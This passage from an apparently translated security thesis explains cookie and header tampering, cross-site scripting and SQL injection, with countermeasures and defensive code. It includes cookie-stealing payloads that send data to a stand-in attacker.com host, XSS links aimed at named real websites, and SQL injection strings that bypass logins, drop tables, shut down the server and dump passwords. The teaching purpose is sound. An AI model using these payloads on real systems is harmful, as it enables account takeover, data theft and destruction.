Because the cookie is the most security-sensitive storage component, cookies are used to keep state for the HTTP protocol more often than hidden form fields and URL variables. They are also used to store the user's information while the application is in use, and other session data. All kinds of cookies, persistent or non-persistent, secure or insecure, can be altered by the user and sent back to the server. A hacker can therefore change the cookie's content to damage the application.
With free tools such as Winhex, even a non-persistent cookie's content can be changed. SSL can only protect the cookie in transit.
Example 4.III.1-1: a cookie used to store information for a travel-information web application:
Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;
The cookie marks this user as not an Admin (ADMIN=no), but what happens if the hacker changes this field? The hacker can change it to:
Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;
The hacker now takes the role of an administrator of the application.
III.2. Some countermeasures
Use a session object to store important information on the server. When the application needs to check a user's information, it uses the user's sessionID to look up that user's information in the cache or in the database.
Build a mechanism that checks the cookie's content for invalid values, from which it can tell that the cookie is forged. For example, the administrator flag is set to true in the cookie, but the user sequence number in the cookie does not match the administrator's sequence number stored on the server.
The last method is to encrypt the cookie. There are several encryption methods, such as symmetric (a single key for both encryption and decryption) or asymmetric (two separate keys, a public key for encryption and a private key for decryption).
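The countermeasures of sections II.2 and III.2 (a keyed digest over the hidden fields, a server-side session looked up by an opaque sessionID, and ignoring a client-supplied ADMIN flag) as one added Python example; this is not the thesis's code. It assumes a constructed server key and an in-memory session store, and substitutes HMAC-SHA256 for the MD5 the text names.

```python
import hashlib
import hmac
import secrets
from typing import Optional
from urllib.parse import parse_qs, urlencode

# Assumed server-side secret (constructed for this example); generated once, never sent to clients.
SERVER_KEY = b"constructed-demo-key-replace-in-deployment"

# Server-side session store: the cookie carries only the opaque sid, never the privileges.
SESSIONS: dict = {}


def reference_string(fields: dict) -> str:
    """Join every hidden field name and value into one string and digest it with the key.
    The text names MD5; HMAC-SHA256 is the keyed construction substituted here."""
    canonical = "&".join(f"{name}={fields[name]}" for name in sorted(fields))
    return hmac.new(SERVER_KEY, canonical.encode(), hashlib.sha256).hexdigest()


def render_form(fields: dict) -> str:
    """What the server embeds in the page: the hidden fields plus the 'sig' reference string."""
    out = dict(fields)
    out["sig"] = reference_string(fields)
    return urlencode(out)


def verify_submission(body: str) -> Optional[dict]:
    """Parse the POST body, recompute the reference string over the submitted hidden fields
    and compare; None means a field (for example giaca) was altered on the client."""
    parsed = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    sig = parsed.pop("sig", "")
    if not hmac.compare_digest(sig, reference_string(parsed)):
        return None
    return parsed


def login(username: str, is_admin: bool) -> str:
    """Create a server-side session record and return the opaque sessionID for the cookie."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"username": username, "admin": is_admin}
    return sid


def is_admin_request(cookie_header: str) -> bool:
    """Decide admin rights from the server-side record behind 'sid' only; a client-supplied
    'ADMIN=yes' in the cookie header is parsed but never consulted."""
    jar = {}
    for part in cookie_header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            jar[name] = value
    record = SESSIONS.get(jar.get("sid", ""))
    return bool(record and record["admin"])


if __name__ == "__main__":
    page = render_form({"giaca": "99.99", "sanpham": "42"})
    print(verify_submission(page))                                       # accepted
    print(verify_submission(page.replace("giaca=99.99", "giaca=0.99")))  # None: tampered
    sid = login("alice", False)
    print(is_admin_request(f"lang=en-us; ADMIN=yes; sid={sid}"))         # False
```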
IV. MANIPULATING HTTP HEADERS
The URL, hidden form fields and cookies are all components that store information which an ordinary user can view and change. However, all of these components are transported through the HTTP Header. So although the HTTP Header is not an application parameter, all information is placed in it before being sent, and this section therefore covers altering an HTTP Header.
IV.1. Concept
Normally only the browser and the server exchange HTTP Headers (see part one, chapter 2, section II for details); most web applications do not. However, a hacker can write a program to manipulate HTTP headers (view their content, create new ones) or use free proxies that allow the data sent from the browser to be changed. The hacker can also attack directly by using telnet to send an HTTP Request to the server.
Example 4.IV.1-1:
su-2.05# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.0
Referer: www.redhat.com/login.asp
User-Agent:

HTTP/1.1 200 OK
Date: Mon, 17 Dec 2001 20:39:02 GMT
Server:
Connection: close
Content-Type: text/html
The part printed in bold (the request header lines typed by the hacker) is the content the hacker altered.
Example 4.IV.1-2:
The Referer header contains the URL of the web page from which the request was sent. Some applications therefore check this header to make sure the request was sent from the application's own web page. This is meant to stop the hacker from saving the web page to their machine, editing the form attributes, defeating client-side validation or server-side includes, and then submitting it. But this check fails, because the hacker can edit the Referer header so that the request looks as if it was sent from the legitimate page:
Referer: www.redhat.com/login.asp
IV.2. Some countermeasures
Simply do not trust HTTP headers unless security measures are in place. Headers sent from the server, such as cookies, can be encrypted. For headers sent from the client, do not use parameters such as referer to carry out security checks.
Remarks:
Important information exchanged between the browser and the server should not be stored as plain strings but should be encrypted; in addition, this information should be checked and compared with the data in the database or in the server's cache, to guard against its content being tampered with.
Besides this, validating data is necessary because almost all attack techniques rely on the data entered via the URL, hidden form fields or cookies, such as the Cross-Site Scripting attack in the next chapter or SQL Injection in chapter 6.
Chapter 5
INJECTING CODE THAT EXECUTES IN THE VICTIM'S BROWSER
Contents:
I. Cross Site Scripting (XSS)
II. The traditional XSS attack method.
III. Some websites found to have XSS holes.
IV. XSS attacks using Flash.
V. Countermeasures.
CHAPTER 5:
INJECTING CODE THAT EXECUTES IN THE VICTIM'S BROWSER (CROSS SITE SCRIPTING)
I. THE CROSS SITE SCRIPTING (XSS) ATTACK TECHNIQUE
Cross Site Scripting (abbreviated XSS) is an attack method in which code fragments capable of stealing or setting important information such as cookies, passwords, etc. are inserted into the source of a web application, so that they run as part of the web application and supply or carry out whatever the hacker wants.
This method does not target the server; it mainly attacks the user's own machine. The hacker exploits the application's lax input checking and the user's limited knowledge, and also plays on the user's curiosity, so that the user loses information easily.
Usually the hacker exploits the URL to present links that trigger program fragments written in a client-side language such as VBScript or JavaScript, which are then executed in the victim's own browser.
Example 5.I-1:
http://hotwired.lycos.com/webmonkey/00/index1.html?tw=alert(document.cookie);
or:
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
The part printed in bold is the code added with the aim of stealing the victim's cookies.
In the 2.I-1 examples above, most of the URL prefixes are addresses of real web applications (e.g. http://www.microsoft.com/education, http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/...); by exploiting the way parameters are passed on the URL, the hacker can easily append cookie-stealing code.
Example 5.I-1 above only illustrates the simplest way, adding one's own code to a web page through the URL. In reality there are very many ways to add JavaScript code for an XSS attack. The hacker can easily use the Document Object Model (DOM) to change the context and content of the web application.
Below is a list of places where code can be inserted:
Example 5.I-2:
&[code]
&{[code]};
[code]
[code]
[code];
(source: http://online.securityfocus.com/archive/1/272037/2002-05-09/2002-05-15/0)
The part printed in bold is where the information-stealing code can be placed.
II. THE TRADITIONAL XSS ATTACK METHOD
Web applications often store important information in cookies. A cookie is a piece of information that the application stores on the user's hard disk. Only the application that set the cookie can read it. Therefore the hacker has a chance to steal the cookie only while the user is in a session with that application. The hacker's first job, after finding a hole in the application, is to find a target page on which to lure the user into logging in.
Steps of a traditional XSS attack:
Figure 5.II-1. The XSS process
Summary of the steps:
Step 1: The hacker learns that the user is using a web application with an XSS hole.
Step 2: The user receives a link through email or on the web page itself (a guestbook or banner makes it easy to add a link created by the hacker). The hacker usually attracts the user's attention with phrases that arouse curiosity, such as "Check your account" or "An attractive prize is waiting for you".
Step 3: The information (cookie, name, password, ...) is sent to the hacker's server.
Step 4: The hacker creates a CGI program (steal.cgi in this example) or a web page that records the stolen information in a file.
Step 5: Once the necessary information has been received, the hacker can use it to break into the user's account.
Example 5.II-1: To exploit the hole in the hotwired.lycos.com application, the hacker can proceed as follows:
Look at this!
An attractive prize is waiting for you
After the user clicks the link "An attractive prize is waiting for you", the cookie on the victim's machine is stolen and passed as a parameter to the hacker's steal.cgi program:
http://www.attacker.com/steal.cgi?lubid=010000508BD3046103F43B8264530098C20100000000;%20p_uniqid=8sJgk9daas7WUMxV0B;%20gv_titan_20=5901=1019511286
The problem is that the programmer may protect the web application by filtering special characters such as quotes or + (which can, for instance, prevent the quote character from being used to run a SQL query). But the hacker can use hex codes in place of the special characters to attack.
Hex numbers are substituted for the ASCII characters.
Example 5.II-2:
http://www.attacker.com/steal.cgi:
h -> 0x0068
t -> 0x0074
t -> 0x0074
p -> 0x0070
: -> 0x003A
/ -> 0x002F
Below is an example of using hex codes in a web application.
Example 5.II-3:
Look at this!
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006B);
u %2B= String.fromCharCode(0x0065);
u %2B= String.fromCharCode(0x0072);
u %2B= String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006F);
u %2B= String.fromCharCode(0x006D);
u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x0073);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0065);
u %2B= String.fromCharCode(0x0061);
u %2B= String.fromCharCode(0x006C);
u %2B= String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x0067);
u %2B= String.fromCharCode(0x0069);
u %2B= String.fromCharCode(0x003F);
u %2B=document.cookie;document.location.replace(u);"
onMouseOver="window.status=http://www.hotwired.lycos.com/index2.html';return true"
onMouseOut="window.status='';return true">An attractive prize is waiting for you
III. SOME WEBSITES FOUND TO HAVE XSS HOLES
Company | Domain | Exploited link
NBC | http://www.shopnbc.com | http://www.shopnbc.com/listing.asp?qu=alert(document.cookie)&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1
Microsoft | http://www.microsoft.com/ | http://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target=alert(document.cookie)
Chase | https://www.chase.com/ | https://www.chase.com/chase/gx.cgi/FTcs?pagename=alert(document.cookie)&urlname=smallbusiness/direct
EBay | https://scgi.ebay.co.uk/ | https://scgi.ebay.co.uk/saw-cgi/eBayISAPI.dll?SSLRegisterShow&countryid=3&siteId=3&co_partnerId=0&UsingSSL=1&aolemail=alert(document.cookie)
Oracle Japan | http://www.oracle.co.jp/ | http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=alert(document.cookie)
IV. XSS ATTACKS USING FLASH
Besides the ways of inserting a dangerous piece of code described above, the hacker can also use Flash files to steal information.
Macromedia Flash can be programmed with a scripting language built into Flash, ActionScript. ActionScript has a simple syntax similar to JavaScript, C or PERL. For example, the getURL() function is used to call another web page; its parameter is usually a URL such as "http://www.yahoo.com".
Example 5.IV-1:
getURL("http://www.yahoo.com")
However, the URL can be replaced with JavaScript:
getURL("javascript:alert(document.cookie)")
Example 5.IV-1 above makes a message box appear containing the cookie of the web page that hosts the Flash file. The web page has thus been attacked by inserting a piece of JavaScript into the web application through a Flash file. A clearer example of this attack is the following.
This is the command inside the Flash file; it is executed when the Flash file is loaded:
getURL("javascript:location('http://www.attacker.com?newcookie='+document.cookie)")
So as soon as the user views the web page containing this Flash file, the cookie created for them by that web page is sent to the hacker.
Figure 5.IV-2: Writing ActionScript in Flash
Example 5.IV-2:
DeviantArt is a well-known website that lets its members upload Flash files for all members to view. A hacker can therefore steal the cookies of members, possibly including the web administrator's account, by registering as a member of this web application, uploading a Flash file to the server and waiting for victims to view it. Below is a link to a Flash file of the kind presented in example 5.IV-2:
http://www.deviantart.com/deviation/1386080
In addition, websites that let members submit HTML data, such as forums, signature features and so on, can also be targets of this attack, by entering code that calls the Flash file.
HEIGHT="48"
id="1"
ALIGN="">
V. COUNTERMEASURES
For data and information entered by users, the web application designer needs to take the following basic steps:
o Create a list of the HTML tags that are allowed.
o Remove the script tag.
o Filter out any JavaScript/Java/VBScript/ActiveX/Flash-related code.
o Filter single and double quotes.
o Filter the Null character (because arbitrary code can be appended after a Null character, so that an application which has filtered the script tag still fails to notice it, since the application assumes the string ends at that Null character).
o Remove the characters > and <.
o Still allow special characters to be entered, but encode them according to a fixed scheme.
As for users, the browser should be configured to ask the user whether scripting languages may be executed on their machine; the user decides according to how much they trust the site.
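The filtering steps above as an added Python example (not the thesis's code): strip the Null character first, encode every special character, and re-enable only an assumed allowlist of tags that carry no attributes.

```python
import html
import re

# Assumed allowlist for this example: tags the application lets users keep, with no attributes.
ALLOWED_TAGS = {"b", "i", "p", "br"}

# One HTML tag: optional slash, tag name, then everything up to '>' (attributes, if any).
_TAG_RE = re.compile(r"<(/?)([A-Za-z][A-Za-z0-9]*)([^>]*)>")


def strip_nulls(user_input: str) -> str:
    """Remove Null characters first: a filter that stops at the first Null would miss
    whatever follows it (for example '<scr' + NUL + 'ipt>' reassembling into a script tag)."""
    return user_input.replace("\x00", "")


def sanitize_html(user_input: str) -> str:
    """Encode every special character (so quotes, < and > reach the browser as text), then
    re-enable only allowlisted tags that carry no attributes; anything else, including
    script tags and event-handler attributes, is shown literally instead of interpreted."""
    text = strip_nulls(user_input)
    pieces = []
    pos = 0
    for m in _TAG_RE.finditer(text):
        pieces.append(html.escape(text[pos:m.start()], quote=True))
        slash, name, attrs = m.group(1), m.group(2).lower(), m.group(3)
        if name in ALLOWED_TAGS and not attrs.strip():
            pieces.append(f"<{slash}{name}>")
        else:
            pieces.append(html.escape(m.group(0), quote=True))
        pos = m.end()
    pieces.append(html.escape(text[pos:], quote=True))
    return "".join(pieces)


if __name__ == "__main__":
    # Constructed inputs modelled on the thesis's examples.
    print(sanitize_html("<b>Look at this!</b>"))
    print(sanitize_html("<script>alert(document.cookie)</script>"))
    print(sanitize_html('<b onMouseOver="window.status=1">prize</b>'))
    print(sanitize_html("<scr\x00ipt>alert(1)</script>"))
```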
Remarks:
The XSS technique is quite common and easy to apply, but the damage is limited to an attack on the victim's machine through the deceptive links or forms that the hacker sends to the victim. Therefore, besides the application checking the correctness of data before using it, the most important thing is for users to be vigilant before entering a new website. It can be said that user vigilance achieves 90% of the security against this technique. In chapter 6, however, the attack targets the server, aiming to gather information from the database and from there seize administrative control of the application.
Chapter 6
SQL QUERY INJECTION
Contents:
I. The concept of SQL Injection
II. Introduction to the database model.
III. Attack methods.
IV. Countermeasures.
CHAPTER 6:
SQL QUERY INJECTION (SQL INJECTION)
I. THE CONCEPT OF SQL INJECTION
SQL Injection exploits holes in the way web code accesses the database. It is not a defect specific to SQL Server; it is a common problem for all other databases as well, such as Oracle, MS Access or IBM DB2.
When the hacker sends data (through forms), the web application executes it and returns to the browser the result of the query, or error messages related to the database. From this information the hacker learns the content of the database and can go on to control the whole application system.
II. INTRODUCTION TO THE DATABASE MODEL
To present this technique more clearly, the thesis uses a User table to illustrate the attack.
User table:
No. | Field name | Physical setup | Field type | Size | Description
1 | tkUsername | Primary key | Text | 50 | Each user has one login account.
2 | tkPassword | | Text | 50 | Login password.
Convention:
The programming language used for illustration in this chapter is ASP, with SQL Server as the database.
III. ATTACK METHODS
III.1. The SQL Injection technique
Below is the simplest SQL injection technique, used to bypass login forms.
Example 6.III.1-1: Suppose the web application contains the following code:
SQLQuery = "SELECT tkUsername FROM User WHERE tkUsername='" & strUsername & "' AND Password='" & tkPassword & "'"
flag = GetQueryResult(SQLQuery)
if flag = "" then
check = FALSE
else
check = TRUE
end if
The code above checks the entered Username and Password strings. If they exist in the User table then check=true, otherwise check=false.
Suppose the values entered are:
Username: ' OR ''='
Password: ' OR ''='
The SQL statement is now:
SELECT tkUsername FROM User WHERE tkUsername='' OR ''='' AND Password='' OR ''=''
The comparison above is always true (since '' always equals ''), so the condition in the WHERE clause is always true. The username value of the first row in the table is selected.
Combined with SQL's special characters:
the character ; marks the end of one query;
the characters -- hide the characters after them on the same line.
Example 6.III.1-2:
Username: '; drop table User--
Password:
The SQL statement is now:
SELECT tkUsername FROM User WHERE tkUsername=''; drop table User--' AND Password=''
With the statement above, the User table is deleted entirely.
Example 6.III.1-3: Another example that uses SQL special characters to break into the system:
Username: admin'--
Password:
The SQL statement:
SELECT tkUsername FROM User WHERE tkUsername='admin'--' AND Password=''
The statement above allows logging in to the system with admin rights without requiring a password.
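The login bypasses of Examples 6.III.1-1 and 6.III.1-3, reproduced as an added Python example (not the thesis's ASP code) against a constructed in-memory SQLite copy of the User table, with the concatenated query beside a parameterised one; the column tkPassword stands in for the page's Password.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory copy of the thesis's User table with two sample accounts."""
    cn = sqlite3.connect(":memory:")
    cn.execute("CREATE TABLE User (tkUsername TEXT PRIMARY KEY, tkPassword TEXT)")
    cn.executemany("INSERT INTO User VALUES (?, ?)",
                   [("admin", "passofAdmin"), ("nhimmap", "passofnhimmap")])
    cn.commit()
    return cn


def build_query_concat(username: str, password: str) -> str:
    """The vulnerable construction of Example 6.III.1-1: input is pasted into the SQL text."""
    return ("SELECT tkUsername FROM User WHERE tkUsername='" + username +
            "' AND tkPassword='" + password + "'")


def login_concat(cn: sqlite3.Connection, username: str, password: str) -> bool:
    """Mirrors the ASP check: any row back means check=TRUE. A SQL error counts as failure."""
    try:
        return cn.execute(build_query_concat(username, password)).fetchone() is not None
    except sqlite3.Error:
        return False


def login_param(cn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened form: the values are bound parameters, so a quote or -- inside them is data,
    not SQL syntax, and the statement's structure cannot be changed by the input."""
    row = cn.execute(
        "SELECT tkUsername FROM User WHERE tkUsername=? AND tkPassword=?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    # Constructed inputs: a valid login, then the two payloads from the text.
    for user, pw in [("admin", "passofAdmin"), ("' OR ''='", "' OR ''='"), ("admin'--", "")]:
        print(repr(build_query_concat(user, pw)))
        print("  concat:", login_concat(db, user, pw), " param:", login_param(db, user, pw))
```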
III.2. Attacks based on the SELECT statement
Besides the simple technique above, attacks usually rely on error messages to obtain information about tables and their fields. To do this one must understand the error messages and adjust the input accordingly.
The concept of Direct Injection:
Arguments that are inserted into the statement without being enclosed in single or double quotes are the direct injection case. Example III.2.1
Example 6.III.2-1:
StrSQL = "SELECT tkUsername FROM User WHERE tkUsername=" & tName
The concept of Quote Injection:
Cases where the entered argument is placed by the application between two single or double quotes are the Quote Injection case. Example III.2.2
Example 6.III.2-2:
StrSQL = "SELECT tkUsername FROM User WHERE tkUsername='" & tName & "'"
To neutralise the quotes and change the statement while keeping the syntax valid, the injected string must contain a single quote before the inserted characters, and the end of the statement must have a single quote, for instance:
StrSQL = "SELECT tkUsername FROM User WHERE tkUsername='' and ''=''"
If doing this produces an error message related to the ( character, the injected string must contain a ):
Example 6.III.2-3: Suppose:
StrSQL = "SELECT tkUsername FROM User WHERE (tkUsername='" & tName & "')"
Then the valid syntax is:
StrSQL = "SELECT tkUsername FROM User WHERE (tkUsername='') or ''=''"
In addition, the % character is often used in information searches.
Example 6.III.2-4:
StrSQL = "SELECT tkUsername FROM User WHERE tkUsername like '%" & tName & "'"
III.3. Attacks based on the HAVING clause
HAVING, used together with the GROUP BY clause, is an effective method for obtaining table and field information; it is discussed in more depth in section 4.
III.4. Attacks based on the UNION operator
The SELECT statement is used to retrieve information from the database. Usually the position where something can be inserted into a SELECT statement is after WHERE. To return more rows from the table, the condition in the WHERE clause is changed by inserting UNION SELECT.
Example 6.III.4-1:
StrSQL = "SELECT tkUsername FROM User WHERE tkUsername like '%' UNION SELECT tkPassword from User"
The statement above returns a result set that combines tkUsername with tkPassword from the User table.
Note:
The number of columns in the two SELECT statements must match. That is, the number of columns in the original SELECT and in the following UNION SELECT must be equal, and of the same types.
The syntax error returned after inserting the UNION statement makes it possible to learn the type of each field.
Below are examples carried out without knowing the content of the database, relying on HAVING, GROUP BY and UNION:
Example 6.III.4-2: Recall the query needed to log in:
SQLQuery = "SELECT tkUsername,tkPassword FROM User WHERE tkUsername='" & strUsername & "' AND Password='" & tkPassword & "'"
First, to learn the table name and field names used by the query, use a "having" condition, as in the following example:
Value entered:
Username: ' having 1=1--
Error produced:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'User.tkUsername' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
From this error it is known that the table used in the query is User and that the table contains a field named tkUsername.
Next use GROUP BY:
Example 6.III.4-3:
Username: ' group by User.tkUsername having 1=1--
Error produced:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'User.tkPassword' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
So tkPassword is a field of the User table and is used in the query.
Continue using GROUP BY until all the fields of the User table that take part in the query are known. When no more GROUP BY syntax errors are reported, move on to checking the type of each field in the table. UNION is used at this stage:
Example 6.III.4-4:
Username: union select sum(tkUsername) from User
The sum command computes the total of the argument in parentheses. The argument must be numeric. If the argument is not numeric, the following error occurs:
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
With the error message above, tkUsername must certainly be of type varchar.
With the method above, the type of each field in the table is easily determined.
Having received all of the information above, the hacker can easily add information to the User table.
Example 6.III.4-5:
Username: ; insert into User(tkUsername,tkPassword) values ('admin', '')--
The hacker who adds content as in Example 6.III.4.2.4 now becomes the administrator without needing a password for authentication.
Example 6.III.4-6: illustrates a procedure that lets the hacker read all the information in the User table:
Step 1: Create a stored procedure that copies all the information from the two fields tkUsername and tkPassword of the User table into one string in a new table foo with a single field ret, using the following code:
create proc test
as
begin
declare @ret varchar(8000)
set @ret=':'
select @ret=@ret+' '+tkUsername+'/'+tkPassword from User
select @ret as ret into foo
end
The statement is executed by entering it into the form:
Username: ;Create proc test as begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+tkUsername+'/'+tkPassword from User select @ret as ret into foo
Step 2: Call the stored procedure
Once the stored procedure has been created as above, call it:
Username: ;exec test
Step 3: Use UNION to view the content of table foo
Username: ;select ret,1 from foo union select 1,1 from foo
Error produced:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/passofAdmin nhimmap/passofnhimmap minhthu/passofminhthu' to a column of data type int.
Through a few steps, the hacker obtains the content of the User table, including the tkUsername names and tkPassword passwords.
Step 4: The hacker may also carefully delete table foo to remove traces:
Username: ; drop table foo--
Example 6.III.4-7: Here is another way to determine the content of the User table, using the following search method:
Step 1: Search the User table row by row
Username: union select 1,1
or:
Username: union select min(tkUsername),1 from User where tkUsername > 'a'--
Error produced:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int.
The first user in the User table is admin.
Step 2:
To learn the following values, enter the string:
Username: ;select min(tkUsername),1 from User where tkUsername > 'admin' union select 1,1 from User
Error produced:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'nhimmap' to a column of data type int.
Step 3:
Repeating step 2 yields, row by row, each value of the tkUsername field in the User table.
Step 4:
To learn about tkPassword as well, do the following:
Username: ;select tkPassword,1 from User where tkUsername='admin' union select 1,1 from User
Error produced:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'passOfAdmin' to a column of data type int.
To learn about the tables and columns in the database, one can query the system table INFORMATION_SCHEMA.TABLES.
Example 6.III.4-8:
select TABLE_NAME from INFORMATION_SCHEMA.TABLES
INFORMATION_SCHEMA.TABLES holds information about all the tables on the server. The TABLE_NAME field holds the name of each table in the database.
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='User'
The statement above is used to learn about the columns of a table.
UNION can also be used to learn the environment variables of SQL Server.
Example 6.III.4-9: To learn which server the application is running on, do the following:
Username: ;select @@SERVERNAME union select 1
Error produced:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'KHOAI_NGU' to a column of data type int.
III.5. Attacks based on the INSERT statement
The INSERT keyword is used to put information into the database. The INSERT statement is typically used in cases such as user registration information, guestbooks, and so on.
The ";" and "--" techniques are used just as with the SELECT statement, but the number and types of the values entered must be correct to avoid syntax errors (if the data types cannot be determined, all values can be entered as numbers).
Example 6.III.5-1:
SQLString = "INSERT INTO User VALUES ('" & strUsername & "', '" & strName & "', '" & strPassWord & "', '" & strLimitSize & "')"
III.6. Attacks based on STORED PROCEDURES
Stored procedures are used in web programming to reduce complexity in the application and to avoid SQL Injection attacks. However, a hacker can still exploit stored procedures to attack the system.
Example 6.III.6-1: The stored procedure sp_login takes two parameters, username and password. If the input is:
Username: nhimmap
Password: ';shutdown--
the call to the stored procedure becomes:
exec sp_login 'nhimmap','';shutdown--
The shutdown command stops SQL Server immediately.
III.7. Advanced
III.7.1. Strings without single quotes:
Programmers can protect their applications by removing all quotes; usually quotes are removed by replacing one quote with two quotes.
Example 6.III.7.1-1:
Function escape(input)
input = replace(input, "'", "''")
escape = input
end function
Clearly this blocks all the attack types above. However, if one wants to create a string value without using quotes, the char() function can be used, as in the following example:
Example 6.III.7.1-2:
INSERT into User VALUES(666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)
Example 6.III.7.1-3 above, although a query without any single quotes, can still insert strings into the table, and is equivalent to:
INSERT into User VALUES(666,'chris','chris',255)
The hacker can also choose a numeric username and password to avoid quotes, as in the following example:
Example 6.III.7.1-4:
INSERT into User VALUES(667,123,123,0xffff)
SQL Server automatically converts the numbers to strings.
III.7.2. Second-order attacks
Even though the application has replaced single quotes, SQL code can still be injected.
Example 6.III.7.2-1: To register an account in the application, enter the username as follows:
Username: admin'--
Password: passofadmin
The application replaces the quote, so the resulting INSERT statement is:
INSERT into User VALUES(123, 'admin''--', 'password',0xffff)
(but the database stores admin'--)
Suppose the application lets users change their password. The ASP code is designed to ensure that the user enters the correct old password before entering a new one. The code is as follows:
username = escape( Request.form("username") );
oldpassword = escape( Request.form("oldpassword") );
newpassword = escape( Request.form("newpassword") );
var rso = Server.CreateObject("ADODB.Recordset");
var sql = "select * from users where username = '" + username + "' and password = '" + oldpassword + "'";
rso.open( sql, cn );
if (rso.EOF)
{
The query that sets the new password is:
sql = "update users set password = '" + newpassword + "' where username= '" + rso("username") + "'"
rso("username") is the username value obtained from the login query, and it is admin'--
The query is now:
update users set password = 'password' where username = 'admin'--'
So the hacker can change the admin's password to a value of their choosing.
This case still exists in most large applications today that use this kind of data filtering. The best solution is to reject bad values rather than to fix them. But there is a problem: some input fields (such as a name field) legitimately allow these characters, for example O'Brien.
The best way to solve this is to disallow the single quote. If that is not possible, filter and replace as above. In that case, the best approach is to ensure that all data put into a SQL query (including values taken from the database) is strictly controlled.
Some applications defend against injected queries by limiting the length of the input field. With this limit some attack types cannot be carried out, but there is still a gap for the hacker to exploit.
Example 6.III.7.2-2:
Suppose both username and password are limited to at most 16 characters. Enter:
Username: aaaaaaaaaaaaaaa'
Password: ; shutdown--
The application replaces one single quote with two single quotes, but because the string length is limited to 16 characters the single quote that was just added is cut off. The SQL statement is:
Select * from users where username='aaaaaaaaaaaaaaa'' and password='; shutdown--'
As a result, the username in the statement has the value:
aaaaaaaaaaaaaaa' and password=
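An added Python example, not from the thesis, that reproduces Example 6.III.7.2-2 and the second-order update query above: a small lexer shows what the SQL parser sees when escaping happens before truncation versus after.

```python
from typing import Optional, Tuple, List

LIMIT = 16  # column length assumed for username and password in Example 6.III.7.2-2


def escape(value: str) -> str:
    """The thesis's escape(): double every single quote (Example 6.III.7.1-1)."""
    return value.replace("'", "''")


def build_escape_then_truncate(username: str, password: str) -> str:
    """Defective order from Example 6.III.7.2-2: escape first, then cut to the column length.
    Truncation can drop the doubling quote and leave an unbalanced one behind."""
    u = escape(username)[:LIMIT]
    p = escape(password)[:LIMIT]
    return f"select * from users where username='{u}' and password='{p}'"


def build_truncate_then_escape(username: str, password: str) -> str:
    """Safer order: enforce the length on the raw value, then escape the whole value.
    (Bound parameters remain the real fix; this only isolates the ordering error.)"""
    u = escape(username[:LIMIT])
    p = escape(password[:LIMIT])
    return f"select * from users where username='{u}' and password='{p}'"


def lex(sql: str) -> Optional[Tuple[List[str], str]]:
    """Split a T-SQL-style statement the way the server's parser would. Returns
    (literals, skeleton), where skeleton is the statement with each quoted literal
    replaced by '?', honouring '' inside literals and '--' line comments outside them.
    An unterminated literal returns None."""
    literals, skeleton, i, n = [], [], 0, len(sql)
    while i < n:
        ch = sql[i]
        if ch == "'":
            buf, j = [], i + 1
            while True:
                if j >= n:
                    return None
                if sql[j] == "'":
                    if j + 1 < n and sql[j + 1] == "'":
                        buf.append("'")
                        j += 2
                        continue
                    break
                buf.append(sql[j])
                j += 1
            literals.append("".join(buf))
            skeleton.append("?")
            i = j + 1
        elif sql.startswith("--", i):
            break  # the rest of the line is a comment
        else:
            skeleton.append(ch)
            i += 1
    return literals, "".join(skeleton)


if __name__ == "__main__":
    # Constructed inputs from the thesis's example: 15 'a' plus a quote, and the payload.
    user, pw = "aaaaaaaaaaaaaaa'", "; shutdown--"
    for build in (build_escape_then_truncate, build_truncate_then_escape):
        sql = build(user, pw)
        print(build.__name__, "->", sql)
        print("   parser sees:", lex(sql))
    # The second-order query from Example 6.III.7.2-1: the stored admin'-- closes the literal.
    print(lex("update users set password = 'password' where username = 'admin'--'"))
```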
III.7.3. Evading auditing:
